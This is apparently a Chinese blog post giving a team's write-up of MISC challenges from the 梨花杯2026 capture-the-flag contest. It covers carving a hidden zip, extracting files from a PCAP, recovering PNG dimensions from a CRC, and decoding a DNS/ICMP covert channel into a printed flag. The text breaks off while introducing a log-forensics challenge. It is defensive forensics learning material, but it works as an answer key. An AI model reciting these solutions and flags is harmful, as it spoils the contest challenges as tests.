{"id":1416,"date":"2026-05-17T16:46:09","date_gmt":"2026-05-17T08:46:09","guid":{"rendered":"http:\/\/shr1mp.top\/?p=1416"},"modified":"2026-05-19T18:44:25","modified_gmt":"2026-05-19T10:44:25","slug":"%e6%a2%a8%e8%8a%b1%e6%9d%af2026","status":"publish","type":"post","link":"https:\/\/shr1mp.top\/index.php\/2026\/05\/17\/%e6%a2%a8%e8%8a%b1%e6%9d%af2026\/","title":{"rendered":"\u68a8\u82b1\u676f2026"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u961f\u540d\uff1a\u7f51\u5b89\u4e0d\u80fd\u5931\u53bb\u4e8c\u680b\uff083\u4e2a25\u5c0f\u767b\u4eec\u7684\u961f\u4f0d\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516183217_771_201065204b6f9d587.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516183217_771_201065204b6f9d587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u4eba\u62ff\u4e86\u4e2aMISC\u76841\u4e2a\u4e8c\u8840\uff0c\u4e24\u4e2a\u4e09\u8840\uff0c\u961f\u4f0d\u603b\u6392\u540d\u7b2c\u4e09\u3002\u961f\u53cb\u6253\u74e6\uff0c\u540e\u53f0ai\u641e\u51fa\u6765\u4e2aWeb\u7684\u4e00\u8840\u96be\u9898\uff0c\u611f\u6168\u73b0\u5728\u90fd\u662fAI\u5927\u65f6\u4ee3\u4e86&#8230;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516164849_765_21b9011b1ff9e6aa6.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516164849_765_21b9011b1ff9e6aa6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"misc\">MISC<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5c3e\u5df4\u91cc\u7684\u538b\u7f29\u5305\">\u5c3e\u5df4\u91cc\u7684\u538b\u7f29\u5305<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u8fd9\u5f20\u56fe\u7247\u770b\u8d77\u6765\u5f88\u6b63\u5e38\uff0c\u4f46\u5b83\u7684\u201c\u5c3e\u5df4\u201d\u4f3c\u4e4e\u6709\u70b9\u591a\u4f59\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u62ff\u5230\u4e00\u4e2awebp\uff0c010\u6253\u5f00\u627e\u5230\u4e0b\u9762\u6709flag.txt\u5b57\u6837,<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154112ffba462daadb3b94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154112ffba462daadb3b94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u60f3\u5230\u6587\u4ef6\u91cc\u9762\u85cf\u4e86\u4e1c\u897f\uff0c\u7528foremost\u8fdb\u884c\u6587\u4ef6\u5206\u79bb<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">foremost\u63d0\u53d6\u51fa\u4e00\u4e2azip\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154152261e7fae0f900dca.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154152261e7fae0f900dca.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u6709\u52a0\u5bc6\uff0c\u6253\u5f00\u76f4\u63a5\u662fflag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4fdd\u5bc6\u4e3a\u4eba\u6c11-\u4fdd\u5bc6\u9760\u4eba\u6c11\">\u4fdd\u5bc6\u4e3a\u4eba\u6c11\uff0c\u4fdd\u5bc6\u9760\u4eba\u6c11<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5185\u7f51\u5907\u4efd\u670d\u52a1\u5668\u51fa\u73b0\u4e86\u4e00\u6b21\u53ef\u7591\u7684\u6587\u4ef6\u4f20\u8f93\uff0c\u73b0\u573a\u53ea\u4fdd\u7559\u4e86\u4e00\u4efd\u6d41\u91cf\u5305\u3002 \u8bf7\u4ece PCAP \u4e2d\u8fd8\u539f\u88ab\u4f20\u8f93\u7684\u539f\u59cb\u6587\u4ef6\uff0c\u5e76\u4ece\u6587\u4ef6\u5185\u5bb9\u4e2d\u627e\u5230 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed9\u4e86\u4e00\u4e2a\u6d41\u91cf<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u7528NetA\u5206\u79bb\u51fa\u4e0b\u8f7d\u7684\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1546574667b70917bacc18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1546574667b70917bacc18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6587\u4ef6\u91cc\u9762\uff1aeviedence\\capture_notes\\flag.txt\u76f4\u63a5\u51faflag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4f60\u77e5\u9053crc\u5417\">\u4f60\u77e5\u9053CRC\u5417\uff1f<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5e08\u5085\uff0c\u8fd9\u5f20 PNG \u56fe\u7247\u597d\u50cf\u574f\u4e86\u3002\u4fee\u597d\u5b83\uff0c\u627e\u5230\u9690\u85cf\u5728\u56fe\u7247\u4e2d\u7684 flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9053\u9898\u53ef\u4ee5\u7528PZ\u79d2,\u4f46\u662f\u672c\u6587\u9009\u62e9\u4e86\u4e00\u79cd\u504f\u672c\u8d28\u7684\u65b9\u6cd5<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u68c0\u67e5-png-\u6587\u4ef6\u7ed3\u6784\">1. 
\u68c0\u67e5 PNG \u6587\u4ef6\u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">PNG \u6587\u4ef6\u7b7e\u540d (<code>89 50 4E 47 0D 0A 1A 0A<\/code>) \u6b63\u5e38\uff0c\u8bf4\u660e\u6587\u4ef6\u5934\u6ca1\u6709\u88ab\u7834\u574f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u6790 chunk \u7ed3\u6784\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Chunk<\/th><th>Length<\/th><th>CRC \u72b6\u6001<\/th><\/tr><\/thead><tbody><tr><td>IHDR<\/td><td>13<\/td><td><strong>MISMATCH<\/strong><\/td><\/tr><tr><td>IDAT<\/td><td>65536<\/td><td>OK<\/td><\/tr><tr><td>IDAT<\/td><td>65536<\/td><td>OK<\/td><\/tr><tr><td>IDAT<\/td><td>47357<\/td><td>OK<\/td><\/tr><tr><td>IEND<\/td><td>0<\/td><td>OK<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">IHDR \u6570\u636e\u5982\u4e0b\uff1a Width: 0x000001da = 474 Height: 0x0000017b = 379 Bit depth: 8 Color type: 2 (RGB)<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5f53\u524d\u6570\u636e\u8ba1\u7b97\u7684 CRC\uff1a<code>0xfac6ddb3<\/code><\/li>\n\n\n\n<li>\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684 CRC\uff1a<code>0x7cfb886d<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">CRC \u4e0d\u5339\u914d\u3002IDAT\/IEND chunk \u7684 CRC \u5168\u90e8\u6b63\u786e\uff0c\u8bf4\u660e\u95ee\u9898\u4ec5\u51fa\u5728 IHDR \u4e0a\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u63a8\u6d4b-crc-\u662f\u539f\u6765\u7684-ihdr-\u6570\u636e\u88ab\u7be1\u6539\u8fc7\">2. 
\u63a8\u6d4b\uff1aCRC \u662f\u539f\u6765\u7684\uff0cIHDR \u6570\u636e\u88ab\u7be1\u6539\u8fc7<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u4e00\u79cd\u5e38\u89c1\u7684\u9690\u5199\/\u53d6\u8bc1\u624b\u6cd5\uff1a\u4fee\u6539 IHDR \u4e2d\u7684\u5bbd\u9ad8\uff08\u4f7f\u89e3\u7801\u5668\u53ea\u8bfb\u53d6\u56fe\u50cf\u7684\u4e00\u90e8\u5206\uff09\uff0c\u4f46\u4fdd\u7559\u539f\u59cb CRC \u4e0d\u53d8\u3002\u8fd9\u6837\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u56fe\u7247\u4ecd\u7136\u80fd\u6b63\u5e38\u663e\u793a\uff08\u4e0a\u534a\u90e8\u5206\uff09<\/li>\n\n\n\n<li>\u4f46\u56fe\u50cf\u4e0b\u534a\u90e8\u5206\u7684\u5185\u5bb9\u88ab\u300c\u9690\u85cf\u300d\u4e86<\/li>\n\n\n\n<li>\u539f\u59cb CRC \u53ef\u4ee5\u4f5c\u4e3a\u7ebf\u7d22\u6062\u590d\u771f\u5b9e\u7684\u5bbd\u9ad8<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u7206\u7834\u539f\u59cb\u5bbd\u9ad8\">3. \u7206\u7834\u539f\u59cb\u5bbd\u9ad8<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">CRC \u8ba1\u7b97\u8303\u56f4\u4e3a <code>chunk type (4 bytes) + chunk data (13 bytes)<\/code>\uff0c\u5176\u4e2d chunk type \u56fa\u5b9a\u4e3a <code>IHDR<\/code>\uff0cchunk data \u7684\u540e 5 \u5b57\u8282\u56fa\u5b9a\uff08bit depth=8, color type=2, compression=0, filter=0, interlace=0\uff09\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5199\u811a\u672c\u5728\u5408\u7406\u8303\u56f4\u5185\u7206\u7834\u5bbd\u9ad8\uff0c\u5bfb\u627e\u4f7f <code>CRC32(\"IHDR\" + width_bytes + height_bytes + \"\\x08\\x02\\x00\\x00\\x00\") == 0x7cfb886d<\/code> \u7684\u7ec4\u5408\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> import binascii, struct\n    target_crc = 0x7cfb886d\n    ihdr_type = b'IHDR'\n    fixed = bytes(&#91;0x08, 0x02, 0x00, 0x00, 0x00])  # bit_depth, color_type, compression, filter, interlace\n\n    for w in range(1, 4096):\n        wb = struct.pack('&gt;I', w)\n        for h in range(1, 4096):\n            hb = struct.pack('&gt;I', h)\n            crc = binascii.crc32(ihdr_type + wb + hb + 
fixed) &amp; 0xffffffff\n            if crc == target_crc:\n                print(f'FOUND: Width={w}, Height={h}')\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a <code>FOUND: Width=760, Height=560<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u59cb\u56fe\u7247\u5c3a\u5bf8\u4e3a 760\u00d7560<\/strong>\uff0c\u88ab\u7be1\u6539\u4e3a 474\u00d7379\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-\u4fee\u590d\u56fe\u7247\">4. \u4fee\u590d\u56fe\u7247<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06 IHDR \u4e2d\u7684\u5bbd\u9ad8\u4fee\u6539\u4e3a 760\u00d7560\uff0c\u5e76\u91cd\u65b0\u8ba1\u7b97\u6b63\u786e\u7684 CRC \u5199\u5165\u6587\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    import struct, binascii\n    original_width = 760\n    original_height = 560\n\n    ihdr_data = struct.pack('&gt;IIBBBBB', original_width, original_height, 8, 2, 0, 0, 0)\n    new_crc = binascii.crc32(b'IHDR' + ihdr_data) &amp; 0xffffffff\n\n    # \u5c06\u4fee\u590d\u540e\u7684 IHDR \u6570\u636e\u548c CRC \u5199\u56de\u6587\u4ef6\u504f\u79fb\u5904\n    data&#91;16:29] = ihdr_data   # offset 16 = 8(sig) + 4(len) + 4(type)\n    data&#91;29:33] = struct.pack('&gt;I', new_crc)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"5-\u83b7\u53d6-flag\">5. 
\u83b7\u53d6 Flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u590d\u540e\u56fe\u7247\u5c3a\u5bf8\u53d8\u4e3a 760\u00d7560\uff0c\u539f\u6765\u88ab\u9519\u8bef\u9ad8\u5ea6\u300c\u88c1\u6389\u300d\u7684\u4e0b\u534a\u90e8\u5206\uff08\u7b2c 380~560 \u884c\uff0c\u5171 181 \u884c\uff09\u91cd\u65b0\u663e\u793a\u51fa\u6765\uff0c<strong>flag \u76f4\u63a5\u5199\u5728\u56fe\u7247\u5e95\u90e8<\/strong>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1549489ef30a25a90b1e76.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1549489ef30a25a90b1e76.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">**\u672c\u9898\u8003\u5bdf\u5bf9 PNG \u6587\u4ef6\u683c\u5f0f\u7684\u7406\u89e3\u548c CRC32 \u6821\u9a8c\u673a\u5236\u7684\u5229\u7528\u3002\u6838\u5fc3\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>PNG IHDR chunk \u5305\u542b\u56fe\u7247\u5143\u4fe1\u606f\uff08\u5bbd\u3001\u9ad8\u3001\u4f4d\u6df1\u3001\u989c\u8272\u7c7b\u578b\u7b49\uff09\uff0c\u5171 13 \u5b57\u8282<\/li>\n\n\n\n<li>\u6bcf\u4e2a chunk \u672b\u5c3e 4 \u5b57\u8282\u4e3a CRC32 \u6821\u9a8c\u503c\uff08\u8ba1\u7b97\u8303\u56f4\uff1achunk type + chunk data\uff09<\/li>\n\n\n\n<li>\u4fee\u6539 IHDR 
\u5bbd\u9ad8\u53ef\u4ee5\u9690\u85cf\u56fe\u7247\u7684\u90e8\u5206\u533a\u57df\uff08\u7f29\u5c0f\u9ad8\u5ea6\u4f7f\u89e3\u7801\u5668\u63d0\u524d\u505c\u6b62\uff09<\/li>\n\n\n\n<li>\u4fdd\u7559\u539f\u59cb CRC \u53ef\u4ee5\u4f5c\u4e3a\u7ebf\u7d22\u9006\u5411\u6062\u590d\u539f\u59cb\u5bbd\u9ad8<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u7f51\u7edc\u5b89\u5168\u65e0\u5c0f\u4e8b\">\u7f51\u7edc\u5b89\u5168\u65e0\u5c0f\u4e8b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u7814\u53d1\u673a 10.10.7.23 \u5728\u591c\u95f4\u89e6\u53d1\u4e86\u201c\u5f02\u5e38\u5916\u8054\u5fc3\u8df3\u201d\u544a\u8b66\u3002\u5b89\u5168\u8bbe\u5907\u53ea\u4fdd\u7559\u4e86\u4e00\u5c0f\u6bb5\u6293\u5305\uff0c\u6b63\u5e38 DNS \u67e5\u8be2\u548c ICMP \u63a2\u6d4b\u6d41\u91cf\u4e2d\u4f3c\u4e4e\u6df7\u5165\u4e86\u67d0\u79cd\u9690\u853d\u4f20\u8f93\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">1500 \u5305 PCAP\uff0c\u6570\u636e\u7ecf\u53cc\u901a\u9053\u9690\u853d\u4f20\u8f93\uff1aDNS <code>lhgame.local<\/code> \u5b50\u57df\u540d\u627f\u8f7d\u5076\u6570\u5e8f\u5217\u5757\uff0cICMP Echo \u8bf7\u6c42 payload \u627f\u8f7d\u5947\u6570\u5e8f\u5217\u5757\u3002\u4ea4\u7ec7\u540e base32 \u89e3\u7801 \u2192 zlib \u89e3\u538b\u5f97 flag\u3002\u5176\u4f59 100 \u4e2a\u5e26\u7f16\u7801\u5b50\u57df\u540d\u7684\u6b63\u5e38 DNS \u67e5\u8be2\u4e3a\u63a9\u62a4\u6d41\u91cf\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u8bc6\u522b\u53cc\u901a\u9053\">1: \u8bc6\u522b\u53cc\u901a\u9053<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5206\u6790\u53d1\u73b0\u4e24\u7c7b\u5f02\u5e38\u6d41\u91cf\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>DNS \u67e5\u8be2<\/strong> <code>sNNN.XXXXXXXX.cdn-sync.lhgame.local<\/code> \u2014 \u5e8f\u5217\u53f7 s000, s002, s004, s006, s008, s010\uff08\u5076\u6570\uff09<\/li>\n\n\n\n<li><strong>ICMP Echo Request<\/strong> payload 
<code>ts=...;seq=NNN;data=XXXXXXXX;stat<\/code> \u2014 \u5e8f\u5217\u53f7 001, 003, 005, 007, 009\uff08\u5947\u6570\uff09<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u3010\u5947\u6570\u5076\u6570\u8fd9\u70b9\u5f88\u5173\u952e\uff0c\u5fd9\u6d3b\u4e86\u5f88\u4e45\u624d\u53d1\u73b0\u7684\u8fd9\u4e2a\u89c4\u5f8b\u3011<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8c\u8005\u5e8f\u5217\u53f7\u4e92\u8865\uff0c\u7ec4\u6210\u5b8c\u6574 000-010\u3002\u6bcf\u4e2a data \u5b57\u6bb5\u4e3a 7-8 \u5b57\u7b26\u7684 base32 \u7f16\u7801\u5757\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u4ea4\u7ec7\u91cd\u7ec4\u4e0e\u89e3\u7801\">2: \u4ea4\u7ec7\u91cd\u7ec4\u4e0e\u89e3\u7801<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6309\u6570\u5b57\u5e8f\u5217\u53f7\u6392\u5e8f\u5408\u5e76\u6240\u6709 data \u5757\uff0cbase32 \u89e3\u7801\u540e zlib \u89e3\u538b\u5373\u5f97 flag\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from scapy.all import *\n    import re, base64, zlib\n\n    packets = rdpcap('traffic.pcap')\n    all_chunks = &#91;]\n\n    # \u63d0\u53d6 DNS lhgame (\u5076\u6570\u5e8f\u5217)\n    for pkt in packets:\n        if DNS in pkt and pkt&#91;DNS].qd:\n            qname = pkt&#91;DNS].qd.qname.decode().lower().rstrip('.')\n            if 'lhgame' in qname:\n                parts = qname.split('.')\n                seq = int(parts&#91;0]&#91;1:])      # s000 -&gt; 0\n                data = parts&#91;1]\n                all_chunks.append((seq, data))\n\n    # \u63d0\u53d6 ICMP (\u5947\u6570\u5e8f\u5217)\n    for pkt in packets:\n        if ICMP in pkt and pkt&#91;ICMP].type == 8:\n            payload = bytes(pkt&#91;ICMP].payload).decode('ascii', errors='ignore')\n            m = re.search(r'seq=(\\d+);data=(&#91;a-z0-9]+);', payload)\n            if m:\n                all_chunks.append((int(m.group(1)), m.group(2)))\n\n    # \u53bb\u91cd\u3001\u6392\u5e8f\u3001\u5408\u5e76\n    seen = set()\n    unique = &#91;]\n    for seq, 
data in sorted(all_chunks):\n        if seq not in seen:\n            seen.add(seq)\n            unique.append(data)\n\n    combined = ''.join(unique)\n    decoded = base64.b32decode(combined.upper() + '=' * ((-len(combined)) % 8))\n    flag = zlib.decompress(decoded).decode()\n    print(flag)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{dns_icmp_mixed_covert_channel_7c9f2a}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u591c\u822a\u65e5\u5fd7\">\u591c\u822a\u65e5\u5fd7<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/19\/-2026-05-19-183310fb7ff637fcc8bb3f.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/19\/-2026-05-19-183310fb7ff637fcc8bb3f.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><figcaption class=\"wp-element-caption\">\u8fd9\u91cc\u63a8\u8350\u4e0blovelyspark\uff0c\u8fd9\u4e2a\u5de5\u5177\u592a\u597d\u7528\u4e86<\/figcaption><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u4e1a\u52a1\u7684 prod-web-02 \u5728\u51cc\u6668\u51fa\u73b0\u77ed\u6682\u5f02\u5e38\u3002SOC \u53ea\u6253\u5305\u51fa\u4e86 4 \u4efd\u65e5\u5fd7\uff1aNginx \u8bbf\u95ee\u65e5\u5fd7\u3001\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u3001\u7cfb\u7edf\u8ba4\u8bc1\u65e5\u5fd7\u3001WAF 
\u65e5\u5fd7\u3002\u65e5\u5fd7\u91cf\u8f83\u5927\uff0c\u4e14\u5b58\u5728\u626b\u63cf\u5668\u566a\u58f0\u548c\u8bef\u62a5\u3002\u8bf7\u901a\u8fc7\u65f6\u95f4\u7ebf\u68b3\u7406\u3001IP \u5173\u8054\u3001\u5f02\u5e38\u884c\u4e3a\u68c0\u6d4b\u7b49\u65b9\u6cd5\uff0c\u8fd8\u539f\u653b\u51fb\u94fe\u5e76\u627e\u51fa flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf4\u660e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u65e5\u5fd7\u65f6\u95f4\u5747\u4e3a UTC+8\u3002<\/li>\n\n\n\n<li>flag \u683c\u5f0f\u4e3a LHFLAG{\u2026}\u3002<\/li>\n\n\n\n<li>\u9009\u624b\u53ea\u9700\u8981\u5206\u6790\u9644\u4ef6\u5185\u65e5\u5fd7\uff0c\u4e0d\u9700\u8981\u8054\u7f51\uff0c\u4e0d\u9700\u8981\u653b\u51fb\u4efb\u4f55\u771f\u5b9e\u670d\u52a1\u3002<\/li>\n\n\n\n<li>\u90e8\u5206\u5b57\u6bb5\u662f\u4e1a\u52a1\u4e3a\u4e86\u6392\u969c\u5199\u5165\u7684 forensic\/checkpoint \u4fe1\u606f\uff0c\u4f46\u53ea\u6709\u771f\u6b63\u653b\u51fb\u94fe\u4e0a\u7684\u7247\u6bb5\u80fd\u62fc\u51fa\u6b63\u786e flag\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u9644\u4ef6\u7ed3\u6784\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/access.log Nginx \u98ce\u683c\u8bbf\u95ee\u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/app.log JSON Lines 